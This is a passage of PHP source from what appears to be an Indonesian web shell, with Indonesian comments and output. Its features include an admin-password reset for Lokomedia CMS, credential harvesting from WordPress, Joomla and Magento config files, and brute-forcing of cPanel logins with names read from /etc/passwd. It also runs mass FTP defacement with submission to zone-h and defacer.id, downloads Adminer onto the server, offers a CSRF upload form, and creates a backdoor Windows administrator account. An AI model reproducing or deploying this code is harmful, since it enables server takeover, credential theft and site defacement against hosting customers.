  754. $prefix = "users";
  755. $option = "identitas";
  756. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  757. $db = mysql_select_db($dbname);
  758. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  759. $result = mysql_fetch_array($q);
  760. $target = $result[alamat_website];
  761. if($target == '') {
  762. $target2 = $result[url];
  763. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  764. if($target2 == '') {
  765. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  766. } else {
  767. $cek_login3 = file_get_contents("$target2/adminweb/");
  768. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  769. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  770. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  771. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  772. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  773. } else {
  774. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  775. }
  776. }
  777. } else {
  778. $cek_login = file_get_contents("$target/adminweb/");
  779. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  780. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  781. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  782. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  783. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  784. } else {
  785. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  786. }
  787. }
  788. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  789. echo "Config => ".$file_conf."<br>";
  790. echo "CMS => Lokomedia<br>";
  791. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  792. echo $url_target2;
  793. } else {
  794. echo $url_target;
  795. }
  796. if(!$update OR !$conn OR !$db) {
  797. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  798. } else {
  799. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  800. }
  801. mysql_close($conn);
  802. }
  803. }
  804. }
  805. } else {
  806. echo "<center>
  807. <h1>Auto Edit User Config</h1>
  808. <form method='post'>
  809. DIR Config: <br>
  810. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  811. Set User & Pass: <br>
  812. <input type='text' name='user_baru' value='syndicate' placeholder='user_baru'><br>
  813. <input type='text' name='pass_baru' value='loscardos' placeholder='pass_baru'><br>
  814. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  815. </form>
  816. </span><br>
  817. ";
  818. }
  819. } elseif($_GET['do'] == 'cpanel') {
  820. if($_POST['crack']) {
  821. $usercp = explode("\r\n", $_POST['user_cp']);
  822. $passcp = explode("\r\n", $_POST['pass_cp']);
  823. $i = 0;
  824. foreach($usercp as $ucp) {
  825. foreach($passcp as $pcp) {
  826. if(@mysql_connect('localhost', $ucp, $pcp)) {
  827. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  828. } else {
  829. $_SESSION[$ucp] = "1";
  830. $_SESSION[$pcp] = "1";
  831. if($ucp == '' || $pcp == '') {
  832.  
  833. } else {
  834. $i++;
  835. if(function_exists('posix_getpwuid')) {
  836. $domain_cp = file_get_contents("/etc/named.conf");
  837. if($domain_cp == '') {
  838. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
  839. } else {
  840. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  841. foreach($domains_cp[1] as $dj) {
  842. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  843. $user_cp_url = $user_cp_url['name'];
  844. if($user_cp_url == $ucp) {
  845. $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
  846. break;
  847. }
  848. }
  849. }
  850. } else {
  851. $dom = "<font color=red>function is Disable by system</font>";
  852. }
  853. echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
  854. }
  855. }
  856. }
  857. }
  858. }
  859. if($i == 0) {
  860. } else {
  861. echo "<br>sukses nyolong ".$i." <font color=lime>.</font>";
  862. }
  863. } else {
  864. echo "<center>
  865. <form method='post'>
  866. USER: <br>
  867. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  868. $_usercp = fopen("/etc/passwd","r");
  869. while($getu = fgets($_usercp)) {
  870. if($getu == '' || !$_usercp) {
  871. echo "<font color=red>Can't read /etc/passwd</font>";
  872. } else {
  873. preg_match_all("/(.*?):x:/", $getu, $u);
  874. foreach($u[1] as $user_cp) {
  875. if(is_dir("/home/$user_cp/public_html")) {
  876. echo "$user_cp\n";
  877. }
  878. }
  879. }
  880. }
  881. echo "</textarea><br>
  882. PASS: <br>
  883. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  884. function cp_pass($dir) {
  885. $pass = "";
  886. $dira = scandir($dir);
  887. foreach($dira as $dirb) {
  888. if(!is_file("$dir/$dirb")) continue;
  889. $ambil = file_get_contents("$dir/$dirb");
  890. if(preg_match("/WordPress/", $ambil)) {
  891. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  892. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  893. $pass .= ambilkata($ambil,"password = '","'")."\n";
  894. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  895. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  896. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  897. $pass .= ambilkata($ambil,'password = "','"')."\n";
  898. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  899. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  900. } elseif(preg_match("/^[client]$/", $ambil)) {
  901. preg_match("/password=(.*?)/", $ambil, $pass1);
  902. if(preg_match('/"/', $pass1[1])) {
  903. $pass1[1] = str_replace('"', "", $pass1[1]);
  904. $pass .= $pass1[1]."\n";
  905. } else {
  906. $pass .= $pass1[1]."\n";
  907. }
  908. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  909. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  910. }
  911. }
  912. echo $pass;
  913. }
  914. $cp_pass = cp_pass($dir);
  915. echo $cp_pass;
  916. echo "</textarea><br>
  917. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  918. </form>
  919. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  920. }
  921. } elseif($_GET['do'] == 'cpftp_auto') {
  922. if($_POST['crack']) {
  923. $usercp = explode("\r\n", $_POST['user_cp']);
  924. $passcp = explode("\r\n", $_POST['pass_cp']);
  925. $i = 0;
  926. foreach($usercp as $ucp) {
  927. foreach($passcp as $pcp) {
  928. if(@mysql_connect('localhost', $ucp, $pcp)) {
  929. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  930. } else {
  931. $_SESSION[$ucp] = "1";
  932. $_SESSION[$pcp] = "1";
  933. if($ucp == '' || $pcp == '') {
  934. //
  935. } else {
  936. echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  937. $ftp_conn = ftp_connect(gethostbyname($_SERVER['HTTP_HOST']));
  938. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  939. if((!$ftp_login) || (!$ftp_conn)) {
  940. echo "[+] <font color=red>Login Gagal</font><br><br>";
  941. } else {
  942. echo "[+] <font color=lime>Login Sukses</font><br>";
  943. $fi = htmlspecialchars($_POST['file_deface']);
  944. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  945. if($deface) {
  946. $i++;
  947. echo "[+] <font color=lime>Deface Sukses</font><br>";
  948. if(function_exists('posix_getpwuid')) {
  949. $domain_cp = file_get_contents("/etc/named.conf");
  950. if($domain_cp == '') {
  951. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  952. } else {
  953. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  954. foreach($domains_cp[1] as $dj) {
  955. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  956. $user_cp_url = $user_cp_url['name'];
  957. if($user_cp_url == $ucp) {
  958. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  959. break;
  960. }
  961. }
  962. }
  963. } else {
  964. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  965. }
  966. } else {
  967. echo "[-] <font color=red>Deface Gagal</font><br><br>";
  968. }
  969. }
  970. //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  971. }
  972. }
  973. }
  974. }
  975. }
  976. if($i == 0) {
  977. } else {
  978. echo "<br>sukses deface ".$i." Cpanel <font color=lime>.</font>";
  979. }
  980. } else {
  981. echo "<center>
  982. <form method='post'>
  983. Filename: <br>
  984. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  985. Deface Page: <br>
  986. <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
  987. USER: <br>
  988. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  989. $_usercp = fopen("/etc/passwd","r");
  990. while($getu = fgets($_usercp)) {
  991. if($getu == '' || !$_usercp) {
  992. echo "<font color=red>Can't read /etc/passwd</font>";
  993. } else {
  994. preg_match_all("/(.*?):x:/", $getu, $u);
  995. foreach($u[1] as $user_cp) {
  996. if(is_dir("/home/$user_cp/public_html")) {
  997. echo "$user_cp\n";
  998. }
  999. }
  1000. }
  1001. }
  1002. echo "</textarea><br>
  1003. PASS: <br>
  1004. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1005. function cp_pass($dir) {
  1006. $pass = "";
  1007. $dira = scandir($dir);
  1008. foreach($dira as $dirb) {
  1009. if(!is_file("$dir/$dirb")) continue;
  1010. $ambil = file_get_contents("$dir/$dirb");
  1011. if(preg_match("/WordPress/", $ambil)) {
  1012. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1013. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1014. $pass .= ambilkata($ambil,"password = '","'")."\n";
  1015. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1016. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1017. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1018. $pass .= ambilkata($ambil,'password = "','"')."\n";
  1019. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1020. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  1021. } elseif(preg_match("/client/", $ambil)) {
  1022. preg_match("/password=(.*)/", $ambil, $pass1);
  1023. if(preg_match('/"/', $pass1[1])) {
  1024. $pass1[1] = str_replace('"', "", $pass1[1]);
  1025. $pass .= $pass1[1]."\n";
  1026. }
  1027. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1028. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1029. }
  1030. }
  1031. echo $pass;
  1032. }
  1033. $cp_pass = cp_pass($dir);
  1034. echo $cp_pass;
  1035. echo "</textarea><br>
  1036. <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
  1037. </form>
  1038. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1039. }
  1040. }elseif($_GET['do'] == 'defacerid') {
  1041. echo "<center><form method='post'>
  1042. <u>Defacer</u>: <br>
  1043. <input type='text' name='hekel' size='50' value='Fuck'><br>
  1044. <u>Team</u>: <br>
  1045. <input type='text' name='tim' size='50' value='XaiSyndicate'><br>
  1046. <u>Domains</u>: <br>
  1047. <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
  1048. <input type='submit' name='go' value='Submit' style='width: 450px;'>
  1049. </form>";
  1050. $site = explode("\r\n", $_POST['sites']);
  1051. $go = $_POST['go'];
  1052. $hekel = $_POST['hekel'];
  1053. $tim = $_POST['tim'];
  1054. if($go) {
  1055. foreach($site as $sites) {
  1056. $zh = $sites;
  1057. $form_url = "https://www.defacer.id/notify";
  1058. $data_to_post = array();
  1059. $data_to_post['attacker'] = "$hekel";
  1060. $data_to_post['team'] = "$tim";
  1061. $data_to_post['poc'] = 'SQL Injection';
  1062. $data_to_post['url'] = "$zh";
  1063. $curl = curl_init();
  1064. curl_setopt($curl,CURLOPT_URL, $form_url);
  1065. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  1066. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  1067. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  1068. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  1069. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  1070. $result = curl_exec($curl);
  1071. echo $result;
  1072. curl_close($curl);
  1073. echo "<br>";
  1074. }
  1075. }
  1076. } elseif($_GET['do'] == 'smtp') {
  1077. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  1078. function scj($dir) {
  1079. $dira = scandir($dir);
  1080. foreach($dira as $dirb) {
  1081. if(!is_file("$dir/$dirb")) continue;
  1082. $ambil = file_get_contents("$dir/$dirb");
  1083. $ambil = str_replace("$", "", $ambil);
  1084. if(preg_match("/JConfig|joomla/", $ambil)) {
  1085. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  1086. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  1087. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  1088. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  1089. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  1090. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  1091. echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
  1092. echo "SMTP port: <font color=lime>$smtp_port</font><br>";
  1093. echo "SMTP user: <font color=lime>$smtp_user</font><br>";
  1094. echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
  1095. echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
  1096. echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
  1097. }
  1098. }
  1099. }
  1100. $smpt_hunter = scj($dir);
  1101. echo $smpt_hunter;
  1102.  
  1103. } elseif($_GET['do'] == 'zoneh') {
  1104. if($_POST['submit']) {
  1105. $domain = explode("\r\n", $_POST['url']);
  1106. $nick = $_POST['nick'];
  1107. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  1108. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  1109. function zoneh($url,$nick) {
  1110. $ch = curl_init("http://www.zone-h.com/notify/single");
  1111. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1112. curl_setopt($ch, CURLOPT_POST, true);
  1113. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  1114. return curl_exec($ch);
  1115. curl_close($ch);
  1116. }
  1117. foreach($domain as $url) {
  1118. $zoneh = zoneh($url,$nick);
  1119. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  1120. echo "$url -> <font color=lime>OK</font><br>";
  1121. } else {
  1122. echo "$url -> <font color=red>ERROR</font><br>";
  1123. }
  1124. }
  1125. } else {
  1126. echo "<center><form method='post'>
  1127. <u>Defacer</u>: <br>
  1128. <input type='text' name='nick' size='50' value='XaiSyndicate'><br>
  1129. <u>Domains</u>: <br>
  1130. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  1131. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  1132. </form>";
  1133. }
  1134. echo "</center>";
  1135.  
  1136. } elseif($_GET['do'] == 'adminer') {
  1137. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1138. function adminer($url, $isi) {
  1139. $fp = fopen($isi, "w");
  1140. $ch = curl_init();
  1141. curl_setopt($ch, CURLOPT_URL, $url);
  1142. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1143. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1144. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1145. curl_setopt($ch, CURLOPT_FILE, $fp);
  1146. return curl_exec($ch);
  1147. curl_close($ch);
  1148. fclose($fp);
  1149. ob_flush();
  1150. flush();
  1151. }
  1152. if(file_exists('adminer.php')) {
  1153. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1154. } else {
  1155. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  1156. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1157. } else {
  1158. echo "<center><font color=red>gagal buat file adminer</font></center>";
  1159. }
  1160. }
  1161. } elseif($_GET['do'] == 'csrfup')
  1162. {
  1163. echo '<html>
  1164. <center><h1 style="font-size:33px;">CSRF Exploiter Online</h1><br><br>
  1165. <font size="3">*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc</font>
  1166. <br><br>
  1167. <form method="post" style="font-size:25px;">
  1168. URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/path/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
  1169. POST File: <input type="text" name="pf" size="50" height="10" placeholder="Lihat diatas ^" style="margin: 5px auto; padding-left: 5px;" required><br>
  1170. <input type="submit" name="d" value="Lock!">
  1171. </form>';
  1172. $url = $_POST["url"];
  1173. $pf = $_POST["pf"];
  1174. $d = $_POST["d"];
  1175. if($d) {
  1176. echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Upload'></form></form>
  1177. </html>";
  1178. }
  1179. } elseif($_GET['do'] == 'tools') {
  1180. echo "<iframe src='http://loscardos.ye.vc/' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";
  1181. } elseif($_GET['do'] == 'krdp_shell') {
  1182. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  1183. if($_POST['create']) {
  1184. $user = htmlspecialchars($_POST['user']);
  1185. $pass = htmlspecialchars($_POST['pass']);
  1186. if(preg_match("/$user/", exe("net user"))) {
  1187. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
  1188. } else {
  1189. $add_user = exe("net user $user $pass /add");
  1190. $add_groups1 = exe("net localgroup Administrators $user /add");
  1191. $add_groups2 = exe("net localgroup Administrator $user /add");
  1192. $add_groups3 = exe("net localgroup Administrateur $user /add");
  1193. echo "[ RDP ACCOUNT INFO ]<br>
  1194. ------------------------------<br>
  1195. IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font><br>
  1196. Username: <font color=lime>$user</font><br>
  1197. Password: <font color=lime>$pass</font><br>
  1198. ------------------------------<br><br>
  1199. [ STATUS ]<br>
  1200. ------------------------------<br>
  1201. ";
  1202. if($add_user) {
  1203. echo "[add user] -> <font color='lime'>Berhasil</font><br>";
  1204. } else {
  1205. echo "[add user] -> <font color='red'>Gagal</font><br>";
  1206. }
  1207. if($add_groups1) {
  1208. echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
  1209. } elseif($add_groups2) {
  1210. echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
  1211. } elseif($add_groups3) {
  1212. echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
  1213. } else {
  1214. echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
  1215. }
  1216. echo "------------------------------<br>";
  1217. }
  1218. } elseif($_POST['s_opsi']) {
  1219. $user = htmlspecialchars($_POST['r_user']);
  1220. if($_POST['opsi'] == '1') {
  1221. $cek = exe("net user $user");
  1222. echo "Checking username <font color=lime>$user</font> ....... ";
  1223. if(preg_match("/$user/", $cek)) {
  1224. echo "[ <font color=lime>Sudah ada</font> ]<br>
  1225. ------------------------------<br><br>
  1226. <pre>$cek</pre>";
  1227. } else {
  1228. echo "[ <font color=red>belum ada</font> ]";
  1229. }
  1230. } elseif($_POST['opsi'] == '2') {
  1231. $cek = exe("net user $user indoxploit");
  1232. if(preg_match("/$user/", exe("net user"))) {
  1233. echo "[change password: <font color=lime>indoxploit</font>] -> ";
  1234. if($cek) {
  1235. echo "<font color=lime>Berhasil</font>";
  1236. } else {
  1237. echo "<font color=red>Gagal</font>";
  1238. }
  1239. } else {
  1240. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  1241. }
  1242. } elseif($_POST['opsi'] == '3') {
  1243. $cek = exe("net user $user /DELETE");
  1244. if(preg_match("/$user/", exe("net user"))) {
  1245. echo "[remove user: <font color=lime>$user</font>] -> ";
  1246. if($cek) {
  1247. echo "<font color=lime>Berhasil</font>";
  1248. } else {
  1249. echo "<font color=red>Gagal</font>";
  1250. }
  1251. } else {
  1252. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  1253. }
  1254. } else {
  1255. //
  1256. }
  1257. } else {
  1258. echo "-- Create RDP --<br>
  1259. <form method='post'>
  1260. <input type='text' name='user' placeholder='username' value='indoxploit' required>
  1261. <input type='text' name='pass' placeholder='password' value='indoxploit' required>
  1262. <input type='submit' name='create' value='>>'>
  1263. </form>
  1264. -- Option --<br>
  1265. <form method='post'>
  1266. <input type='text' name='r_user' placeholder='username' required>
  1267. <select name='opsi'>
  1268. <option value='1'>Cek Username</option>
  1269. <option value='2'>Ubah Password</option>
  1270. <option value='3'>Hapus Username</option>
  1271. </select>
  1272. <input type='submit' name='s_opsi' value='>>'>
  1273. </form>
  1274. ";
  1275. }
  1276. } else {
  1277. echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
  1278. }
  1279. } elseif($_GET['act'] == 'newfile') {
  1280. if($_POST['new_save_file']) {
  1281. $newfile = htmlspecialchars($_POST['newfile']);
  1282. $fopen = fopen($newfile, "a+");
  1283. if($fopen) {
  1284. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  1285. } else {
  1286. $act = "<font color=red>permission denied</font>";
  1287. }
  1288. }
  1289. echo $act;
  1290. echo "<form method='post'>
  1291. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  1292. <input type='submit' name='new_save_file' value='Submit'>
  1293. </form>";
  1294. } elseif($_GET['act'] == 'newfolder') {
  1295. if($_POST['new_save_folder']) {
  1296. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  1297. if(!mkdir($new_folder)) {
  1298. $act = "<font color=red>permission denied</font>";
  1299. } else {
  1300. $act = "<script>window.location='?dir=".$dir."';</script>";
  1301. }
  1302. }
  1303. echo $act;
  1304. echo "<form method='post'>
  1305. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  1306. <input type='submit' name='new_save_folder' value='Submit'>
  1307. </form>";
  1308. } elseif($_GET['act'] == 'rename_dir') {
  1309. if($_POST['dir_rename']) {
  1310. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  1311. if($dir_rename) {
  1312. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1313. } else {
  1314. $act = "<font color=red>permission denied</font>";
  1315. }
  1316. echo "".$act."<br>";
  1317. }
  1318. echo "<form method='post'>
  1319. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  1320. <input type='submit' name='dir_rename' value='rename'>
  1321. </form>";
  1322. } elseif($_GET['act'] == 'delete_dir') {
  1323. $delete_dir = rmdir($dir);
  1324. if($delete_dir) {
  1325. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1326. } else {
  1327. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  1328. }
  1329. echo $act;
  1330. } elseif($_GET['act'] == 'view') {
  1331. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1332. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  1333. } elseif($_GET['act'] == 'edit') {
  1334. if($_POST['save']) {
  1335. $save = file_put_contents($_GET['file'], $_POST['src']);
  1336. if($save) {
  1337. $act = "<font color=lime>Saved!</font>";
  1338. } else {
  1339. $act = "<font color=red>permission denied</font>";
  1340. }
  1341. echo "".$act."<br>";
  1342. }
  1343. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1344. echo "<form method='post'>
  1345. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  1346. <input type='submit' value='Save' name='save' style='width: 500px;'>
  1347. </form>";
  1348. } elseif($_GET['act'] == 'rename') {
  1349. if($_POST['do_rename']) {
  1350. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  1351. if($rename) {
  1352. $act = "<script>window.location='?dir=".$dir."';</script>";
  1353. } else {
  1354. $act = "<font color=red>permission denied</font>";
  1355. }
  1356. echo "".$act."<br>";
  1357. }
  1358. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1359. echo "<form method='post'>
  1360. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  1361. <input type='submit' name='do_rename' value='rename'>
  1362. </form>";
  1363. } elseif($_GET['act'] == 'delete') {
  1364. $delete = unlink($_GET['file']);
  1365. if($delete) {
  1366. $act = "<script>window.location='?dir=".$dir."';</script>";
  1367. } else {
  1368. $act = "<font color=red>permission denied</font>";
  1369. }
  1370. echo $act;
  1371. } elseif(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  1372. @ob_clean();
  1373. $file = $_GET['file'];
  1374. @header('Content-Description: File Transfer');
  1375. @header('Content-Type: application/octet-stream');
  1376. @header('Content-Disposition: attachment; filename="'.basename($file).'"');
  1377. @header('Expires: 0');
  1378. @header('Cache-Control: must-revalidate');
  1379. @header('Pragma: public');
  1380. @header('Content-Length: ' . filesize($file));
  1381. readfile($file);
  1382. exit;
  1383. } else {
  1384. if(is_dir($dir) === true) {
  1385. if(!is_readable($dir)) {
  1386. echo "<font color=red>can't open directory. ( not readable )</font>";
  1387. } else {
  1388. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  1389. <tr>
  1390. <th class="th_home"><center>Name</center></th>
  1391. <th class="th_home"><center>Type</center></th>
  1392. <th class="th_home"><center>Size</center></th>
  1393. <th class="th_home"><center>Last Modified</center></th>
  1394. <th class="th_home"><center>Owner/Group</center></th>
  1395. <th class="th_home"><center>Permission</center></th>
  1396. <th class="th_home"><center>Action</center></th>
  1397. </tr>';
  1398. $scandir = scandir($dir);
  1399. foreach($scandir as $dirx) {
  1400. $dtype = filetype("$dir/$dirx");
  1401. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  1402. if(function_exists('posix_getpwuid')) {
  1403. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  1404. $downer = $downer['name'];
  1405. } else {
  1406. //$downer = $uid;
  1407. $downer = fileowner("$dir/$dirx");
  1408. }
  1409. if(function_exists('posix_getgrgid')) {
  1410. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  1411. $dgrp = $dgrp['name'];
  1412. } else {
  1413. $dgrp = filegroup("$dir/$dirx");
  1414. }
  1415. if(!is_dir("$dir/$dirx")) continue;
